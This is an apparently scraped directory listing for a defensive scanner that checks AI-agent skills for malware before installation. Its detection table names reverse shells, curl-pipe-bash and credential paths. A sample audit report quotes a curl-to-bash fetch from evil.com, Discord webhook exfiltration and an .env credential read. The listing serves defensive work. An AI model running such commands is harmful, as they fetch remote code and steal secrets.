Crawler Summary
Security gatekeeper for skill installations. MANDATORY before installing any skill from ClawHub, GitHub, or external sources. Performs deep code analysis to detect malicious patterns, credential access, data exfiltration, command injection, and other security risks. Triggers: "install skill", "clawhub install", "new skill", "add skill", "skill from". Always run this BEFORE installation. --- name: clawhub-skill-scanner description: > Security gatekeeper for skill installations. MANDATORY before installing any skill from ClawHub, GitHub, or external sources. Performs deep code analysis to detect malicious patterns, credential access, data exfiltration, command injection, and other security risks. Triggers: "install skill", "clawhub install", "new skill", "add skill", "skill from". Always run this BEFO Capability contract not published. No trust telemetry is available yet. Last updated 4/14/2026.
Freshness
Last checked 4/14/2026
Best For
clawhub-skill-scanner is best for a, before, python3 workflows where OpenClaw compatibility matters.
Not Ideal For
Contract metadata is missing or unavailable for deterministic execution.
Evidence Sources Checked
editorial-content, GITHUB OPENCLEW, runtime-metrics, public facts pack
Security gatekeeper for skill installations. MANDATORY before installing any skill from ClawHub, GitHub, or external sources. Performs deep code analysis to detect malicious patterns, credential access, data exfiltration, command injection, and other security risks. Triggers: "install skill", "clawhub install", "new skill", "add skill", "skill from". Always run this BEFORE installation. --- name: clawhub-skill-scanner description: > Security gatekeeper for skill installations. MANDATORY before installing any skill from ClawHub, GitHub, or external sources. Performs deep code analysis to detect malicious patterns, credential access, data exfiltration, command injection, and other security risks. Triggers: "install skill", "clawhub install", "new skill", "add skill", "skill from". Always run this BEFO
Public facts
4
Change events
1
Artifacts
0
Freshness
Apr 14, 2026
Capability contract not published. No trust telemetry is available yet. Last updated 4/14/2026.
Trust score
Unknown
Compatibility
OpenClaw
Freshness
Apr 14, 2026
Vendor
Amir Ag
Artifacts
0
Benchmarks
0
Last release
Unpublished
Key links, install path, and a quick operational read before the deeper crawl record.
Summary
Capability contract not published. No trust telemetry is available yet. Last updated 4/14/2026.
Setup snapshot
git clone https://github.com/amir-ag/clawhub-skill-scanner.gitSetup complexity is LOW. This package is likely designed for quick installation with minimal external side-effects.
Final validation: Expose the agent to a mock request payload inside a sandbox and trace the network egress before allowing access to real customer data.
Everything public we have scraped or crawled about this agent, grouped by evidence type with provenance.
Vendor
Amir Ag
Protocol compatibility
OpenClaw
Handshake status
UNKNOWN
Crawlable docs
6 indexed pages on the official domain
Merged public release, docs, artifact, benchmark, pricing, and trust refresh events.
Extracted files, examples, snippets, parameters, dependencies, permissions, and artifact metadata.
Extracted files
0
Examples
4
Snippets
0
Languages
typescript
Parameters
bash
# Scan a skill folder python3 scripts/scan_skill.py /path/to/skill # JSON output for automation python3 scripts/scan_skill.py /path/to/skill --json # Exit code 0 only if SAFE python3 scripts/scan_skill.py /path/to/skill --install-if-safe
text
CRITICAL findings × 30 = Base score WARNING findings × 3 (capped at 10) = Warning contribution
text
════════════════════════════════════════════════════════════
SKILL SECURITY AUDIT: suspicious-skill
════════════════════════════════════════════════════════════
📊 RISK SCORE: 90/100 - 🔴 BLOCKED
🔴 CRITICAL FINDINGS (3)
[install.py:15] Curl pipe to shell (DANGEROUS!)
Code: os.system('curl https://evil.com/x.sh | bash')
[setup.py:42] Discord webhook exfiltration
Code: requests.post('https://discord.com/api/webhooks/...')
[run.py:8] ClawdBot .env access (ClawHavoc target!)
Code: open(os.path.expanduser('~/.clawdbot/.env'))
📁 FILES SCANNED: 5
📏 TOTAL LINES: 230
════════════════════════════════════════════════════════════
🔴 BLOCK - Do NOT install this skill
════════════════════════════════════════════════════════════bash
#!/bin/bash
# clawhub-secure: Scan before install
SKILL="$2"
TEMP="/tmp/skill-audit-$$"
# Fetch without installing
clawhub inspect "$SKILL" --out "$TEMP"
# Scan
python3 /path/to/scan_skill.py "$TEMP" --install-if-safe
if [ $? -eq 0 ]; then
clawhub install "$SKILL"
else
echo "🔴 Installation blocked by security scan"
exit 1
fi
rm -rf "$TEMP"Full documentation captured from public sources, including the complete README when available.
Docs source
GITHUB OPENCLEW
Editorial quality
ready
Security gatekeeper for skill installations. MANDATORY before installing any skill from ClawHub, GitHub, or external sources. Performs deep code analysis to detect malicious patterns, credential access, data exfiltration, command injection, and other security risks. Triggers: "install skill", "clawhub install", "new skill", "add skill", "skill from". Always run this BEFORE installation. --- name: clawhub-skill-scanner description: > Security gatekeeper for skill installations. MANDATORY before installing any skill from ClawHub, GitHub, or external sources. Performs deep code analysis to detect malicious patterns, credential access, data exfiltration, command injection, and other security risks. Triggers: "install skill", "clawhub install", "new skill", "add skill", "skill from". Always run this BEFO
name: clawhub-skill-scanner description: > Security gatekeeper for skill installations. MANDATORY before installing any skill from ClawHub, GitHub, or external sources. Performs deep code analysis to detect malicious patterns, credential access, data exfiltration, command injection, and other security risks. Triggers: "install skill", "clawhub install", "new skill", "add skill", "skill from". Always run this BEFORE installation.
MANDATORY security check before installing external skills.
Inspired by the ClawHavoc campaign that compromised 341 malicious skills on ClawHub.
Run this audit BEFORE any skill installation:
clawhub install <skill># Scan a skill folder
python3 scripts/scan_skill.py /path/to/skill
# JSON output for automation
python3 scripts/scan_skill.py /path/to/skill --json
# Exit code 0 only if SAFE
python3 scripts/scan_skill.py /path/to/skill --install-if-safe
| Category | Patterns |
|----------|----------|
| Reverse Shells | nc -e, bash /dev/tcp, Python socket shells |
| Curl-Pipe-Bash | curl \| bash, wget && chmod +x |
| Credential Access | ~/.ssh, ~/.aws, ~/.openclaw, .env files |
| Data Exfiltration | Discord/Slack webhooks, POST with secrets |
| Malicious Domains | glot.io, pastebin (known malware hosts) |
| Persistence | crontab, systemd, LaunchAgents, .bashrc |
| Command Injection | eval(), exec(), subprocess shell=True |
| Obfuscation | base64 decode pipes, pickle, marshal |
Only patterns that are suspicious regardless of skill type:
We intentionally don't warn on common patterns like:
This reduces noise so real threats stand out.
CRITICAL findings × 30 = Base score
WARNING findings × 3 (capped at 10) = Warning contribution
| Score | Level | Action | |-------|-------|--------| | 0-20 | 🟢 SAFE | Auto-approve | | 21-50 | 🟡 CAUTION | Review findings | | 51-80 | 🔶 DANGER | Detailed review required | | 81-100 | 🔴 BLOCKED | Do NOT install |
════════════════════════════════════════════════════════════
SKILL SECURITY AUDIT: suspicious-skill
════════════════════════════════════════════════════════════
📊 RISK SCORE: 90/100 - 🔴 BLOCKED
🔴 CRITICAL FINDINGS (3)
[install.py:15] Curl pipe to shell (DANGEROUS!)
Code: os.system('curl https://evil.com/x.sh | bash')
[setup.py:42] Discord webhook exfiltration
Code: requests.post('https://discord.com/api/webhooks/...')
[run.py:8] ClawdBot .env access (ClawHavoc target!)
Code: open(os.path.expanduser('~/.clawdbot/.env'))
📁 FILES SCANNED: 5
📏 TOTAL LINES: 230
════════════════════════════════════════════════════════════
🔴 BLOCK - Do NOT install this skill
════════════════════════════════════════════════════════════
Create a wrapper script to auto-scan before installation:
#!/bin/bash
# clawhub-secure: Scan before install
SKILL="$2"
TEMP="/tmp/skill-audit-$$"
# Fetch without installing
clawhub inspect "$SKILL" --out "$TEMP"
# Scan
python3 /path/to/scan_skill.py "$TEMP" --install-if-safe
if [ $? -eq 0 ]; then
clawhub install "$SKILL"
else
echo "🔴 Installation blocked by security scan"
exit 1
fi
rm -rf "$TEMP"
See references/threat-patterns.md for detailed pattern explanations.
Developed in response to the ClawHavoc campaign (Feb 2026) that demonstrated large-scale supply chain attacks via AI agent skill marketplaces.
Machine endpoints, protocol fit, contract coverage, invocation examples, and guardrails for agent-to-agent use.
Contract coverage
Status
missing
Auth
None
Streaming
No
Data region
Unspecified
Protocol support
Requires: none
Forbidden: none
Guardrails
Operational confidence: low
curl -s "https://xpersona.co/api/v1/agents/amir-ag-clawhub-skill-scanner/snapshot"
curl -s "https://xpersona.co/api/v1/agents/amir-ag-clawhub-skill-scanner/contract"
curl -s "https://xpersona.co/api/v1/agents/amir-ag-clawhub-skill-scanner/trust"
Trust and runtime signals, benchmark suites, failure patterns, and practical risk constraints.
Trust signals
Handshake
UNKNOWN
Confidence
unknown
Attempts 30d
unknown
Fallback rate
unknown
Runtime metrics
Observed P50
unknown
Observed P95
unknown
Rate limit
unknown
Estimated cost
unknown
Do not use if
Every public screenshot, visual asset, demo link, and owner-provided destination tied to this agent.
Neighboring agents from the same protocol and source ecosystem for comparison and shortlist building.
Rank
70
AI Agents & MCPs & AI Workflow Automation • (~400 MCP servers for AI agents) • AI Automation / AI Agent with MCPs • AI Workflows & AI Agents • MCPs for AI Agents
Traction
No public download signal
Freshness
Updated 2d ago
Rank
70
AI productivity studio with smart chat, autonomous agents, and 300+ assistants. Unified access to frontier LLMs
Traction
No public download signal
Freshness
Updated 5d ago
Rank
70
Free, local, open-source 24/7 Cowork app and OpenClaw for Gemini CLI, Claude Code, Codex, OpenCode, Qwen Code, Goose CLI, Auggie, and more | 🌟 Star if you like it!
Traction
No public download signal
Freshness
Updated 6d ago
Rank
70
The Frontend for Agents & Generative UI. React + Angular
Traction
No public download signal
Freshness
Updated 23d ago
Contract JSON
{
"contractStatus": "missing",
"authModes": [],
"requires": [],
"forbidden": [],
"supportsMcp": false,
"supportsA2a": false,
"supportsStreaming": false,
"inputSchemaRef": null,
"outputSchemaRef": null,
"dataRegion": null,
"contractUpdatedAt": null,
"sourceUpdatedAt": null,
"freshnessSeconds": null
}Invocation Guide
{
"preferredApi": {
"snapshotUrl": "https://xpersona.co/api/v1/agents/amir-ag-clawhub-skill-scanner/snapshot",
"contractUrl": "https://xpersona.co/api/v1/agents/amir-ag-clawhub-skill-scanner/contract",
"trustUrl": "https://xpersona.co/api/v1/agents/amir-ag-clawhub-skill-scanner/trust"
},
"curlExamples": [
"curl -s \"https://xpersona.co/api/v1/agents/amir-ag-clawhub-skill-scanner/snapshot\"",
"curl -s \"https://xpersona.co/api/v1/agents/amir-ag-clawhub-skill-scanner/contract\"",
"curl -s \"https://xpersona.co/api/v1/agents/amir-ag-clawhub-skill-scanner/trust\""
],
"jsonRequestTemplate": {
"query": "summarize this repo",
"constraints": {
"maxLatencyMs": 2000,
"protocolPreference": [
"OPENCLEW"
]
}
},
"jsonResponseTemplate": {
"ok": true,
"result": {
"summary": "...",
"confidence": 0.9
},
"meta": {
"source": "GITHUB_OPENCLEW",
"generatedAt": "2026-04-16T23:45:48.170Z"
}
},
"retryPolicy": {
"maxAttempts": 3,
"backoffMs": [
500,
1500,
3500
],
"retryableConditions": [
"HTTP_429",
"HTTP_503",
"NETWORK_TIMEOUT"
]
}
}Trust JSON
{
"status": "unavailable",
"handshakeStatus": "UNKNOWN",
"verificationFreshnessHours": null,
"reputationScore": null,
"p95LatencyMs": null,
"successRate30d": null,
"fallbackRate": null,
"attempts30d": null,
"trustUpdatedAt": null,
"trustConfidence": "unknown",
"sourceUpdatedAt": null,
"freshnessSeconds": null
}Capability Matrix
{
"rows": [
{
"key": "OPENCLEW",
"type": "protocol",
"support": "unknown",
"confidenceSource": "profile",
"notes": "Listed on profile"
},
{
"key": "a",
"type": "capability",
"support": "supported",
"confidenceSource": "profile",
"notes": "Declared in agent profile metadata"
},
{
"key": "before",
"type": "capability",
"support": "supported",
"confidenceSource": "profile",
"notes": "Declared in agent profile metadata"
},
{
"key": "python3",
"type": "capability",
"support": "supported",
"confidenceSource": "profile",
"notes": "Declared in agent profile metadata"
}
],
"flattenedTokens": "protocol:OPENCLEW|unknown|profile capability:a|supported|profile capability:before|supported|profile capability:python3|supported|profile"
}Facts JSON
[
{
"factKey": "docs_crawl",
"category": "integration",
"label": "Crawlable docs",
"value": "6 indexed pages on the official domain",
"href": "https://github.com/login?return_to=https%3A%2F%2Fgithub.com%2Fopenclaw%2Fskills%2Ftree%2Fmain%2Fskills%2Fasleep123%2Fcaldav-calendar",
"sourceUrl": "https://github.com/login?return_to=https%3A%2F%2Fgithub.com%2Fopenclaw%2Fskills%2Ftree%2Fmain%2Fskills%2Fasleep123%2Fcaldav-calendar",
"sourceType": "search_document",
"confidence": "medium",
"observedAt": "2026-04-15T05:03:46.393Z",
"isPublic": true
},
{
"factKey": "vendor",
"category": "vendor",
"label": "Vendor",
"value": "Amir Ag",
"href": "https://github.com/amir-ag/clawhub-skill-scanner",
"sourceUrl": "https://github.com/amir-ag/clawhub-skill-scanner",
"sourceType": "profile",
"confidence": "medium",
"observedAt": "2026-04-14T22:24:07.309Z",
"isPublic": true
},
{
"factKey": "protocols",
"category": "compatibility",
"label": "Protocol compatibility",
"value": "OpenClaw",
"href": "https://xpersona.co/api/v1/agents/amir-ag-clawhub-skill-scanner/contract",
"sourceUrl": "https://xpersona.co/api/v1/agents/amir-ag-clawhub-skill-scanner/contract",
"sourceType": "contract",
"confidence": "medium",
"observedAt": "2026-04-14T22:24:07.309Z",
"isPublic": true
},
{
"factKey": "handshake_status",
"category": "security",
"label": "Handshake status",
"value": "UNKNOWN",
"href": "https://xpersona.co/api/v1/agents/amir-ag-clawhub-skill-scanner/trust",
"sourceUrl": "https://xpersona.co/api/v1/agents/amir-ag-clawhub-skill-scanner/trust",
"sourceType": "trust",
"confidence": "medium",
"observedAt": null,
"isPublic": true
}
]Change Events JSON
[
{
"eventType": "docs_update",
"title": "Docs refreshed: Sign in to GitHub · GitHub",
"description": "Fresh crawlable documentation was indexed for the official domain.",
"href": "https://github.com/login?return_to=https%3A%2F%2Fgithub.com%2Fopenclaw%2Fskills%2Ftree%2Fmain%2Fskills%2Fasleep123%2Fcaldav-calendar",
"sourceUrl": "https://github.com/login?return_to=https%3A%2F%2Fgithub.com%2Fopenclaw%2Fskills%2Ftree%2Fmain%2Fskills%2Fasleep123%2Fcaldav-calendar",
"sourceType": "search_document",
"confidence": "medium",
"observedAt": "2026-04-15T05:03:46.393Z",
"isPublic": true
}
]Sponsored
Ads related to clawhub-skill-scanner and adjacent AI workflows.